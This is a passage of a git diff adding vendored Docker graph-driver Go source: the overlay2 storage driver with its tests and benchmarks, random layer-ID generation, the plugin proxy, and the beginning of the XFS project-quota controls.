is enforced to ensure +// that mounts do not fail due to length. + +const ( + driverName = "overlay2" + linkDir = "l" + lowerFile = "lower" + maxDepth = 128 + + // idLength represents the number of random characters + // which can be used to create the unique link identifer + // for every layer. If this value is too long then the + // page size limit for the mount command may be exceeded. + // The idLength should be selected such that following equation + // is true (512 is a buffer for label metadata). + // ((idLength + len(linkDir) + 1) * maxDepth) <= (pageSize - 512) + idLength = 26 +) + +type overlayOptions struct { + overrideKernelCheck bool + quota quota.Quota +} + +// Driver contains information about the home directory and the list of active mounts that are created using this driver. +type Driver struct { + home string + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + ctr *graphdriver.RefCounter + quotaCtl *quota.Control + options overlayOptions + naiveDiff graphdriver.DiffDriver + supportsDType bool +} + +var ( + backingFs = "" + projectQuotaSupported = false + + useNaiveDiffLock sync.Once + useNaiveDiffOnly bool +) + +func init() { + graphdriver.Register(driverName, Init) +} + +// Init returns the a native diff driver for overlay filesystem. +// If overlay filesystem is not supported on the host, graphdriver.ErrNotSupported is returned as error. +// If an overlay filesystem is not supported over an existing filesystem then error graphdriver.ErrIncompatibleFS is returned. +func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + opts, err := parseOptions(options) + if err != nil { + return nil, err + } + + if err := supportsOverlay(); err != nil { + return nil, graphdriver.ErrNotSupported + } + + // require kernel 4.0.0 to ensure multiple lower dirs are supported + v, err := kernel.GetKernelVersion() + if err != nil { + return nil, err + } + if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 4, Major: 0, Minor: 0}) < 0 { + if !opts.overrideKernelCheck { + return nil, graphdriver.ErrNotSupported + } + logrus.Warn("Using pre-4.0.0 kernel for overlay2, mount failures may require kernel update") + } + + fsMagic, err := graphdriver.GetFSMagic(home) + if err != nil { + return nil, err + } + if fsName, ok := graphdriver.FsNames[fsMagic]; ok { + backingFs = fsName + } + + // check if they are running over btrfs, aufs, zfs, overlay, or ecryptfs + switch fsMagic { + case graphdriver.FsMagicBtrfs, graphdriver.FsMagicAufs, graphdriver.FsMagicZfs, graphdriver.FsMagicOverlay, graphdriver.FsMagicEcryptfs: + logrus.Errorf("'overlay2' is not supported over %s", backingFs) + return nil, graphdriver.ErrIncompatibleFS + } + + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + if err != nil { + return nil, err + } + // Create the driver home dir + if err := idtools.MkdirAllAs(path.Join(home, linkDir), 0700, rootUID, rootGID); err != nil && !os.IsExist(err) { + return nil, err + } + + if err := mount.MakePrivate(home); err != nil { + return nil, err + } + + supportsDType, err := fsutils.SupportsDType(home) + if err != nil { + return nil, err + } + if !supportsDType { + // not a fatal error until v1.16 (#27443) + logrus.Warn(overlayutils.ErrDTypeNotSupported("overlay2", backingFs)) + } + + d := &Driver{ + home: home, + uidMaps: uidMaps, + gidMaps: gidMaps, + ctr: graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicOverlay)), + supportsDType: supportsDType, + } + + d.naiveDiff = graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps) + + if backingFs == "xfs" { + // Try to enable project quota support over xfs. + if d.quotaCtl, err = quota.NewControl(home); err == nil { + projectQuotaSupported = true + } + } + + logrus.Debugf("backingFs=%s, projectQuotaSupported=%v", backingFs, projectQuotaSupported) + + return d, nil +} + +func parseOptions(options []string) (*overlayOptions, error) { + o := &overlayOptions{} + for _, option := range options { + key, val, err := parsers.ParseKeyValueOpt(option) + if err != nil { + return nil, err + } + key = strings.ToLower(key) + switch key { + case "overlay2.override_kernel_check": + o.overrideKernelCheck, err = strconv.ParseBool(val) + if err != nil { + return nil, err + } + + default: + return nil, fmt.Errorf("overlay2: Unknown option %s\n", key) + } + } + return o, nil +} + +func supportsOverlay() error { + // We can try to modprobe overlay first before looking at + // proc/filesystems for when overlay is supported + exec.Command("modprobe", "overlay").Run() + + f, err := os.Open("/proc/filesystems") + if err != nil { + return err + } + defer f.Close() + + s := bufio.NewScanner(f) + for s.Scan() { + if s.Text() == "nodev\toverlay" { + return nil + } + } + logrus.Error("'overlay' not found as a supported filesystem on this host. Please ensure kernel is new enough and has overlay support loaded.") + return graphdriver.ErrNotSupported +} + +func useNaiveDiff(home string) bool { + useNaiveDiffLock.Do(func() { + if err := hasOpaqueCopyUpBug(home); err != nil { + logrus.Warnf("Not using native diff for overlay2: %v", err) + useNaiveDiffOnly = true + } + }) + return useNaiveDiffOnly +} + +func (d *Driver) String() string { + return driverName +} + +// Status returns current driver information in a two dimensional string array. +// Output contains "Backing Filesystem" used in this implementation. +func (d *Driver) Status() [][2]string { + return [][2]string{ + {"Backing Filesystem", backingFs}, + {"Supports d_type", strconv.FormatBool(d.supportsDType)}, + {"Native Overlay Diff", strconv.FormatBool(!useNaiveDiff(d.home))}, + } +} + +// GetMetadata returns meta data about the overlay driver such as +// LowerDir, UpperDir, WorkDir and MergeDir used to store data. +func (d *Driver) GetMetadata(id string) (map[string]string, error) { + dir := d.dir(id) + if _, err := os.Stat(dir); err != nil { + return nil, err + } + + metadata := map[string]string{ + "WorkDir": path.Join(dir, "work"), + "MergedDir": path.Join(dir, "merged"), + "UpperDir": path.Join(dir, "diff"), + } + + lowerDirs, err := d.getLowerDirs(id) + if err != nil { + return nil, err + } + if len(lowerDirs) > 0 { + metadata["LowerDir"] = strings.Join(lowerDirs, ":") + } + + return metadata, nil +} + +// Cleanup any state created by overlay which should be cleaned when daemon +// is being shutdown. For now, we just have to unmount the bind mounted +// we had created. +func (d *Driver) Cleanup() error { + return mount.Unmount(d.home) +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. +func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + return d.Create(id, parent, opts) +} + +// Create is used to create the upper, lower, and merge directories required for overlay fs for a given id. +// The parent filesystem is used to configure these directories for the overlay. +func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr error) { + + if opts != nil && len(opts.StorageOpt) != 0 && !projectQuotaSupported { + return fmt.Errorf("--storage-opt is supported only for overlay over xfs with 'pquota' mount option") + } + + dir := d.dir(id) + + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + return err + } + if err := idtools.MkdirAllAs(path.Dir(dir), 0700, rootUID, rootGID); err != nil { + return err + } + if err := idtools.MkdirAs(dir, 0700, rootUID, rootGID); err != nil { + return err + } + + defer func() { + // Clean up on failure + if retErr != nil { + os.RemoveAll(dir) + } + }() + + if opts != nil && len(opts.StorageOpt) > 0 { + driver := &Driver{} + if err := d.parseStorageOpt(opts.StorageOpt, driver); err != nil { + return err + } + + if driver.options.quota.Size > 0 { + // Set container disk quota limit + if err := d.quotaCtl.SetQuota(dir, driver.options.quota); err != nil { + return err + } + } + } + + if err := idtools.MkdirAs(path.Join(dir, "diff"), 0755, rootUID, rootGID); err != nil { + return err + } + + lid := generateID(idLength) + if err := os.Symlink(path.Join("..", id, "diff"), path.Join(d.home, linkDir, lid)); err != nil { + return err + } + + // Write link id to link file + if err := ioutil.WriteFile(path.Join(dir, "link"), []byte(lid), 0644); err != nil { + return err + } + + // if no parent directory, done + if parent == "" { + return nil + } + + if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil { + return err + } + if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil { + return err + } + + lower, err := d.getLower(parent) + if err != nil { + return err + } + if lower != "" { + if err := ioutil.WriteFile(path.Join(dir, lowerFile), []byte(lower), 0666); err != nil { + return err + } + } + + return nil +} + +// Parse overlay storage options +func (d *Driver) parseStorageOpt(storageOpt map[string]string, driver *Driver) error { + // Read size to set the disk project quota per container + for key, val := range storageOpt { + key := strings.ToLower(key) + switch key { + case "size": + size, err := units.RAMInBytes(val) + if err != nil { + return err + } + driver.options.quota.Size = uint64(size) + default: + return fmt.Errorf("Unknown option %s", key) + } + } + + return nil +} + +func (d *Driver) getLower(parent string) (string, error) { + parentDir := d.dir(parent) + + // Ensure parent exists + if _, err := os.Lstat(parentDir); err != nil { + return "", err + } + + // Read Parent link fileA + parentLink, err := ioutil.ReadFile(path.Join(parentDir, "link")) + if err != nil { + return "", err + } + lowers := []string{path.Join(linkDir, string(parentLink))} + + parentLower, err := ioutil.ReadFile(path.Join(parentDir, lowerFile)) + if err == nil { + parentLowers := strings.Split(string(parentLower), ":") + lowers = append(lowers, parentLowers...) + } + if len(lowers) > maxDepth { + return "", errors.New("max depth exceeded") + } + return strings.Join(lowers, ":"), nil +} + +func (d *Driver) dir(id string) string { + return path.Join(d.home, id) +} + +func (d *Driver) getLowerDirs(id string) ([]string, error) { + var lowersArray []string + lowers, err := ioutil.ReadFile(path.Join(d.dir(id), lowerFile)) + if err == nil { + for _, s := range strings.Split(string(lowers), ":") { + lp, err := os.Readlink(path.Join(d.home, s)) + if err != nil { + return nil, err + } + lowersArray = append(lowersArray, path.Clean(path.Join(d.home, linkDir, lp))) + } + } else if !os.IsNotExist(err) { + return nil, err + } + return lowersArray, nil +} + +// Remove cleans the directories that are created for this id. +func (d *Driver) Remove(id string) error { + dir := d.dir(id) + lid, err := ioutil.ReadFile(path.Join(dir, "link")) + if err == nil { + if err := os.RemoveAll(path.Join(d.home, linkDir, string(lid))); err != nil { + logrus.Debugf("Failed to remove link: %v", err) + } + } + + if err := os.RemoveAll(dir); err != nil && !os.IsNotExist(err) { + return err + } + return nil +} + +// Get creates and mounts the required file system for the given id and returns the mount path. +func (d *Driver) Get(id string, mountLabel string) (s string, err error) { + dir := d.dir(id) + if _, err := os.Stat(dir); err != nil { + return "", err + } + + diffDir := path.Join(dir, "diff") + lowers, err := ioutil.ReadFile(path.Join(dir, lowerFile)) + if err != nil { + // If no lower, just return diff directory + if os.IsNotExist(err) { + return diffDir, nil + } + return "", err + } + + mergedDir := path.Join(dir, "merged") + if count := d.ctr.Increment(mergedDir); count > 1 { + return mergedDir, nil + } + defer func() { + if err != nil { + if c := d.ctr.Decrement(mergedDir); c <= 0 { + syscall.Unmount(mergedDir, 0) + } + } + }() + + workDir := path.Join(dir, "work") + splitLowers := strings.Split(string(lowers), ":") + absLowers := make([]string, len(splitLowers)) + for i, s := range splitLowers { + absLowers[i] = path.Join(d.home, s) + } + opts := fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", strings.Join(absLowers, ":"), path.Join(dir, "diff"), path.Join(dir, "work")) + mountData := label.FormatMountLabel(opts, mountLabel) + mount := syscall.Mount + mountTarget := mergedDir + + pageSize := syscall.Getpagesize() + + // Go can return a larger page size than supported by the system + // as of go 1.7. This will be fixed in 1.8 and this block can be + // removed when building with 1.8. + // See https://github.com/golang/go/commit/1b9499b06989d2831e5b156161d6c07642926ee1 + // See https://github.com/docker/docker/issues/27384 + if pageSize > 4096 { + pageSize = 4096 + } + + // Use relative paths and mountFrom when the mount data has exceeded + // the page size. The mount syscall fails if the mount data cannot + // fit within a page and relative links make the mount data much + // smaller at the expense of requiring a fork exec to chroot. + if len(mountData) > pageSize { + opts = fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", string(lowers), path.Join(id, "diff"), path.Join(id, "work")) + mountData = label.FormatMountLabel(opts, mountLabel) + if len(mountData) > pageSize { + return "", fmt.Errorf("cannot mount layer, mount label too large %d", len(mountData)) + } + + mount = func(source string, target string, mType string, flags uintptr, label string) error { + return mountFrom(d.home, source, target, mType, flags, label) + } + mountTarget = path.Join(id, "merged") + } + + if err := mount("overlay", mountTarget, "overlay", 0, mountData); err != nil { + return "", fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err) + } + + // chown "workdir/work" to the remapped root UID/GID. Overlay fs inside a + // user namespace requires this to move a directory from lower to upper. + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + return "", err + } + + if err := os.Chown(path.Join(workDir, "work"), rootUID, rootGID); err != nil { + return "", err + } + + return mergedDir, nil +} + +// Put unmounts the mount path created for the give id. +func (d *Driver) Put(id string) error { + mountpoint := path.Join(d.dir(id), "merged") + if count := d.ctr.Decrement(mountpoint); count > 0 { + return nil + } + if err := syscall.Unmount(mountpoint, 0); err != nil { + logrus.Debugf("Failed to unmount %s overlay: %s - %v", id, mountpoint, err) + } + return nil +} + +// Exists checks to see if the id is already mounted. +func (d *Driver) Exists(id string) bool { + _, err := os.Stat(d.dir(id)) + return err == nil +} + +// isParent returns if the passed in parent is the direct parent of the passed in layer +func (d *Driver) isParent(id, parent string) bool { + lowers, err := d.getLowerDirs(id) + if err != nil { + return false + } + if parent == "" && len(lowers) > 0 { + return false + } + + parentDir := d.dir(parent) + var ld string + if len(lowers) > 0 { + ld = filepath.Dir(lowers[0]) + } + if ld == "" && parent == "" { + return true + } + return ld == parentDir +} + +// ApplyDiff applies the new layer into a root +func (d *Driver) ApplyDiff(id string, parent string, diff io.Reader) (size int64, err error) { + if !d.isParent(id, parent) { + return d.naiveDiff.ApplyDiff(id, parent, diff) + } + + applyDir := d.getDiffPath(id) + + logrus.Debugf("Applying tar in %s", applyDir) + // Overlay doesn't need the parent id to apply the diff + if err := untar(diff, applyDir, &archive.TarOptions{ + UIDMaps: d.uidMaps, + GIDMaps: d.gidMaps, + WhiteoutFormat: archive.OverlayWhiteoutFormat, + }); err != nil { + return 0, err + } + + return directory.Size(applyDir) +} + +func (d *Driver) getDiffPath(id string) string { + dir := d.dir(id) + + return path.Join(dir, "diff") +} + +// DiffSize calculates the changes between the specified id +// and its parent and returns the size in bytes of the changes +// relative to its base filesystem directory. +func (d *Driver) DiffSize(id, parent string) (size int64, err error) { + if useNaiveDiff(d.home) || !d.isParent(id, parent) { + return d.naiveDiff.DiffSize(id, parent) + } + return directory.Size(d.getDiffPath(id)) +} + +// Diff produces an archive of the changes between the specified +// layer and its parent layer which may be "". +func (d *Driver) Diff(id, parent string) (io.ReadCloser, error) { + if useNaiveDiff(d.home) || !d.isParent(id, parent) { + return d.naiveDiff.Diff(id, parent) + } + + diffPath := d.getDiffPath(id) + logrus.Debugf("Tar with options on %s", diffPath) + return archive.TarWithOptions(diffPath, &archive.TarOptions{ + Compression: archive.Uncompressed, + UIDMaps: d.uidMaps, + GIDMaps: d.gidMaps, + WhiteoutFormat: archive.OverlayWhiteoutFormat, + }) +} + +// Changes produces a list of changes between the specified layer +// and its parent layer. If parent is "", then all changes will be ADD changes. +func (d *Driver) Changes(id, parent string) ([]archive.Change, error) { + if useNaiveDiff(d.home) || !d.isParent(id, parent) { + return d.naiveDiff.Changes(id, parent) + } + // Overlay doesn't have snapshots, so we need to get changes from all parent + // layers. + diffPath := d.getDiffPath(id) + layers, err := d.getLowerDirs(id) + if err != nil { + return nil, err + } + + return archive.OverlayChanges(layers, diffPath) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go new file mode 100644 index 0000000000..cf77ff22be --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go @@ -0,0 +1,121 @@ +// +build linux + +package overlay2 + +import ( + "io/ioutil" + "os" + "syscall" + "testing" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/graphtest" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/reexec" +) + +func init() { + // Do not sure chroot to speed run time and allow archive + // errors or hangs to be debugged directly from the test process. + untar = archive.UntarUncompressed + graphdriver.ApplyUncompressedLayer = archive.ApplyUncompressedLayer + + reexec.Init() +} + +func cdMountFrom(dir, device, target, mType, label string) error { + wd, err := os.Getwd() + if err != nil { + return err + } + os.Chdir(dir) + defer os.Chdir(wd) + + return syscall.Mount(device, target, mType, 0, label) +} + +func skipIfNaive(t *testing.T) { + td, err := ioutil.TempDir("", "naive-check-") + if err != nil { + t.Fatalf("Failed to create temp dir: %v", err) + } + defer os.RemoveAll(td) + + if useNaiveDiff(td) { + t.Skipf("Cannot run test with naive diff") + } +} + +// This avoids creating a new driver for each test if all tests are run +// Make sure to put new tests between TestOverlaySetup and TestOverlayTeardown +func TestOverlaySetup(t *testing.T) { + graphtest.GetDriver(t, driverName) +} + +func TestOverlayCreateEmpty(t *testing.T) { + graphtest.DriverTestCreateEmpty(t, driverName) +} + +func TestOverlayCreateBase(t *testing.T) { + graphtest.DriverTestCreateBase(t, driverName) +} + +func TestOverlayCreateSnap(t *testing.T) { + graphtest.DriverTestCreateSnap(t, driverName) +} + +func TestOverlay128LayerRead(t *testing.T) { + graphtest.DriverTestDeepLayerRead(t, 128, driverName) +} + +func TestOverlayDiffApply10Files(t *testing.T) { + skipIfNaive(t) + graphtest.DriverTestDiffApply(t, 10, driverName) +} + +func TestOverlayChanges(t *testing.T) { + skipIfNaive(t) + graphtest.DriverTestChanges(t, driverName) +} + +func TestOverlayTeardown(t *testing.T) { + graphtest.PutDriver(t) +} + +// Benchmarks should always setup new driver + +func BenchmarkExists(b *testing.B) { + graphtest.DriverBenchExists(b, driverName) +} + +func BenchmarkGetEmpty(b *testing.B) { + graphtest.DriverBenchGetEmpty(b, driverName) +} + +func BenchmarkDiffBase(b *testing.B) { + graphtest.DriverBenchDiffBase(b, driverName) +} + +func BenchmarkDiffSmallUpper(b *testing.B) { + graphtest.DriverBenchDiffN(b, 10, 10, driverName) +} + +func BenchmarkDiff10KFileUpper(b *testing.B) { + graphtest.DriverBenchDiffN(b, 10, 10000, driverName) +} + +func BenchmarkDiff10KFilesBottom(b *testing.B) { + graphtest.DriverBenchDiffN(b, 10000, 10, driverName) +} + +func BenchmarkDiffApply100(b *testing.B) { + graphtest.DriverBenchDiffApplyN(b, 100, driverName) +} + +func BenchmarkDiff20Layers(b *testing.B) { + graphtest.DriverBenchDeepLayerDiff(b, 20, driverName) +} + +func BenchmarkRead20Layers(b *testing.B) { + graphtest.DriverBenchDeepLayerRead(b, 20, driverName) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go new file mode 100644 index 0000000000..e5ac4ca8c6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go @@ -0,0 +1,3 @@ +// +build !linux + +package overlay2 diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go new file mode 100644 index 0000000000..af5cb659d5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go @@ -0,0 +1,80 @@ +// +build linux + +package overlay2 + +import ( + "crypto/rand" + "encoding/base32" + "fmt" + "io" + "os" + "syscall" + "time" + + "github.com/Sirupsen/logrus" +) + +// generateID creates a new random string identifier with the given length +func generateID(l int) string { + const ( + // ensures we backoff for less than 450ms total. Use the following to + // select new value, in units of 10ms: + // n*(n+1)/2 = d -> n^2 + n - 2d -> n = (sqrt(8d + 1) - 1)/2 + maxretries = 9 + backoff = time.Millisecond * 10 + ) + + var ( + totalBackoff time.Duration + count int + retries int + size = (l*5 + 7) / 8 + u = make([]byte, size) + ) + // TODO: Include time component, counter component, random component + + for { + // This should never block but the read may fail. Because of this, + // we just try to read the random number generator until we get + // something. This is a very rare condition but may happen. + b := time.Duration(retries) * backoff + time.Sleep(b) + totalBackoff += b + + n, err := io.ReadFull(rand.Reader, u[count:]) + if err != nil { + if retryOnError(err) && retries < maxretries { + count += n + retries++ + logrus.Errorf("error generating version 4 uuid, retrying: %v", err) + continue + } + + // Any other errors represent a system problem. What did someone + // do to /dev/urandom? + panic(fmt.Errorf("error reading random number generator, retried for %v: %v", totalBackoff.String(), err)) + } + + break + } + + s := base32.StdEncoding.EncodeToString(u) + + return s[:l] +} + +// retryOnError tries to detect whether or not retrying would be fruitful. +func retryOnError(err error) bool { + switch err := err.(type) { + case *os.PathError: + return retryOnError(err.Err) // unpack the target error + case syscall.Errno: + if err == syscall.EPERM { + // EPERM represents an entropy pool exhaustion, a condition under + // which we backoff and retry. + return true + } + } + + return false +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go new file mode 100644 index 0000000000..67c6640b4b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go @@ -0,0 +1,18 @@ +// +build linux + +package overlayutils + +import ( + "errors" + "fmt" +) + +// ErrDTypeNotSupported denotes that the backing filesystem doesn't support d_type. +func ErrDTypeNotSupported(driver, backingFs string) error { + msg := fmt.Sprintf("%s: the backing %s filesystem is formatted without d_type support, which leads to incorrect behavior.", driver, backingFs) + if backingFs == "xfs" { + msg += " Reformat the filesystem with ftype=1 to enable d_type support." + } + msg += " Running without d_type support will no longer be supported in Docker 1.16." + return errors.New(msg) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go b/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go new file mode 100644 index 0000000000..7294bcc5f6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go @@ -0,0 +1,43 @@ +package graphdriver + +import ( + "fmt" + "io" + "path/filepath" + + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/plugin/v2" +) + +type pluginClient interface { + // Call calls the specified method with the specified arguments for the plugin. + Call(string, interface{}, interface{}) error + // Stream calls the specified method with the specified arguments for the plugin and returns the response IO stream + Stream(string, interface{}) (io.ReadCloser, error) + // SendFile calls the specified method, and passes through the IO stream + SendFile(string, io.Reader, interface{}) error +} + +func lookupPlugin(name string, pg plugingetter.PluginGetter, config Options) (Driver, error) { + if !config.ExperimentalEnabled { + return nil, fmt.Errorf("graphdriver plugins are only supported with experimental mode") + } + pl, err := pg.Get(name, "GraphDriver", plugingetter.ACQUIRE) + if err != nil { + return nil, fmt.Errorf("Error looking up graphdriver plugin %s: %v", name, err) + } + return newPluginDriver(name, pl, config) +} + +func newPluginDriver(name string, pl plugingetter.CompatPlugin, config Options) (Driver, error) { + home := config.Root + if !pl.IsV1() { + if p, ok := pl.(*v2.Plugin); ok { + if p.PropagatedMount != "" { + home = p.PluginObj.Config.PropagatedMount + } + } + } + proxy := &graphDriverProxy{name, pl} + return proxy, proxy.Init(filepath.Join(home, name), config.DriverOptions, config.UIDMaps, config.GIDMaps) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go b/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go new file mode 100644 index 0000000000..bfe74cc6f9 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go @@ -0,0 +1,252 @@ +package graphdriver + +import ( + "errors" + "fmt" + "io" + "path/filepath" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/plugingetter" +) + +type graphDriverProxy struct { + name string + p plugingetter.CompatPlugin +} + +type graphDriverRequest struct { + ID string `json:",omitempty"` + Parent string `json:",omitempty"` + MountLabel string `json:",omitempty"` + StorageOpt map[string]string `json:",omitempty"` +} + +type graphDriverResponse struct { + Err string `json:",omitempty"` + Dir string `json:",omitempty"` + Exists bool `json:",omitempty"` + Status [][2]string `json:",omitempty"` + Changes []archive.Change `json:",omitempty"` + Size int64 `json:",omitempty"` + Metadata map[string]string `json:",omitempty"` +} + +type graphDriverInitRequest struct { + Home string + Opts []string `json:"Opts"` + UIDMaps []idtools.IDMap `json:"UIDMaps"` + GIDMaps []idtools.IDMap `json:"GIDMaps"` +} + +func (d *graphDriverProxy) Init(home string, opts []string, uidMaps, gidMaps []idtools.IDMap) error { + if !d.p.IsV1() { + if cp, ok := d.p.(plugingetter.CountedPlugin); ok { + // always acquire here, it will be cleaned up on daemon shutdown + cp.Acquire() + } + } + args := &graphDriverInitRequest{ + Home: home, + Opts: opts, + UIDMaps: uidMaps, + GIDMaps: gidMaps, + } + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Init", args, &ret); err != nil { + return err + } + if ret.Err != "" { + return errors.New(ret.Err) + } + return nil +} + +func (d *graphDriverProxy) String() string { + return d.name +} + +func (d *graphDriverProxy) CreateReadWrite(id, parent string, opts *CreateOpts) error { + args := &graphDriverRequest{ + ID: id, + Parent: parent, + } + if opts != nil { + args.MountLabel = opts.MountLabel + args.StorageOpt = opts.StorageOpt + } + + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.CreateReadWrite", args, &ret); err != nil { + return err + } + if ret.Err != "" { + return errors.New(ret.Err) + } + return nil +} + +func (d *graphDriverProxy) Create(id, parent string, opts *CreateOpts) error { + args := &graphDriverRequest{ + ID: id, + Parent: parent, + } + if opts != nil { + args.MountLabel = opts.MountLabel + args.StorageOpt = opts.StorageOpt + } + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Create", args, &ret); err != nil { + return err + } + if ret.Err != "" { + return errors.New(ret.Err) + } + return nil +} + +func (d *graphDriverProxy) Remove(id string) error { + args := &graphDriverRequest{ID: id} + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Remove", args, &ret); err != nil { + return err + } + if ret.Err != "" { + return errors.New(ret.Err) + } + return nil +} + +func (d *graphDriverProxy) Get(id, mountLabel string) (string, error) { + args := &graphDriverRequest{ + ID: id, + MountLabel: mountLabel, + } + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Get", args, &ret); err != nil { + return "", err + } + var err error + if ret.Err != "" { + err = errors.New(ret.Err) + } + return filepath.Join(d.p.BasePath(), ret.Dir), err +} + +func (d *graphDriverProxy) Put(id string) error { + args := &graphDriverRequest{ID: id} + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Put", args, &ret); err != nil { + return err + } + if ret.Err != "" { + return errors.New(ret.Err) + } + return nil +} + +func (d *graphDriverProxy) Exists(id string) bool { + args := &graphDriverRequest{ID: id} + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Exists", args, &ret); err != nil { + return false + } + return ret.Exists +} + +func (d *graphDriverProxy) Status() [][2]string { + args := &graphDriverRequest{} + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Status", args, &ret); err != nil { + return nil + } + return ret.Status +} + +func (d *graphDriverProxy) GetMetadata(id string) (map[string]string, error) { + args := &graphDriverRequest{ + ID: id, + } + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.GetMetadata", args, &ret); err != nil { + return nil, err + } + if ret.Err != "" { + return nil, errors.New(ret.Err) + } + return ret.Metadata, nil +} + +func (d *graphDriverProxy) Cleanup() error { + if !d.p.IsV1() { + if cp, ok := d.p.(plugingetter.CountedPlugin); ok { + // always release + defer cp.Release() + } + } + + args := &graphDriverRequest{} + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Cleanup", args, &ret); err != nil { + return nil + } + if ret.Err != "" { + return errors.New(ret.Err) + } + return nil +} + +func (d *graphDriverProxy) Diff(id, parent string) (io.ReadCloser, error) { + args := &graphDriverRequest{ + ID: id, + Parent: parent, + } + body, err := d.p.Client().Stream("GraphDriver.Diff", args) + if err != nil { + return nil, err + } + return body, nil +} + +func (d *graphDriverProxy) Changes(id, parent string) ([]archive.Change, error) { + args := &graphDriverRequest{ + ID: id, + Parent: parent, + } + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.Changes", args, &ret); err != nil { + return nil, err + } + if ret.Err != "" { + return nil, errors.New(ret.Err) + } + + return ret.Changes, nil +} + +func (d *graphDriverProxy) ApplyDiff(id, parent string, diff io.Reader) (int64, error) { + var ret graphDriverResponse + if err := d.p.Client().SendFile(fmt.Sprintf("GraphDriver.ApplyDiff?id=%s&parent=%s", id, parent), diff, &ret); err != nil { + return -1, err + } + if ret.Err != "" { + return -1, errors.New(ret.Err) + } + return ret.Size, nil +} + +func (d *graphDriverProxy) DiffSize(id, parent string) (int64, error) { + args := &graphDriverRequest{ + ID: id, + Parent: parent, + } + var ret graphDriverResponse + if err := d.p.Client().Call("GraphDriver.DiffSize", args, &ret); err != nil { + return -1, err + } + if ret.Err != "" { + return -1, errors.New(ret.Err) + } + return ret.Size, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go new file mode 100644 index 0000000000..e408d5f906 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go @@ -0,0 +1,339 @@ +// +build linux + +// +// projectquota.go - implements XFS project quota controls +// for setting quota limits on a newly created directory. +// It currently supports the legacy XFS specific ioctls. +// +// TODO: use generic quota control ioctl FS_IOC_FS{GET,SET}XATTR +// for both xfs/ext4 for kernel version >= v4.5 +// + +package quota + +/* +#include +#include +#include +#include +#include + +#ifndef FS_XFLAG_PROJINHERIT +struct fsxattr { + __u32 fsx_xflags; + __u32 fsx_extsize; + __u32 fsx_nextents; + __u32 fsx_projid; + unsigned char fsx_pad[12]; +}; +#define FS_XFLAG_PROJINHERIT 0x00000200 +#endif +#ifndef FS_IOC_FSGETXATTR +#define FS_IOC_FSGETXATTR _IOR ('X', 31, struct fsxattr) +#endif +#ifndef FS_IOC_FSSETXATTR +#define FS_IOC_FSSETXATTR _IOW ('X', 32, struct fsxattr) +#endif + +#ifndef PRJQUOTA +#define PRJQUOTA 2 +#endif +#ifndef XFS_PROJ_QUOTA +#define XFS_PROJ_QUOTA 2 +#endif +#ifndef Q_XSETPQLIM +#define Q_XSETPQLIM QCMD(Q_XSETQLIM, PRJQUOTA) +#endif +#ifndef Q_XGETPQUOTA +#define Q_XGETPQUOTA QCMD(Q_XGETQUOTA, 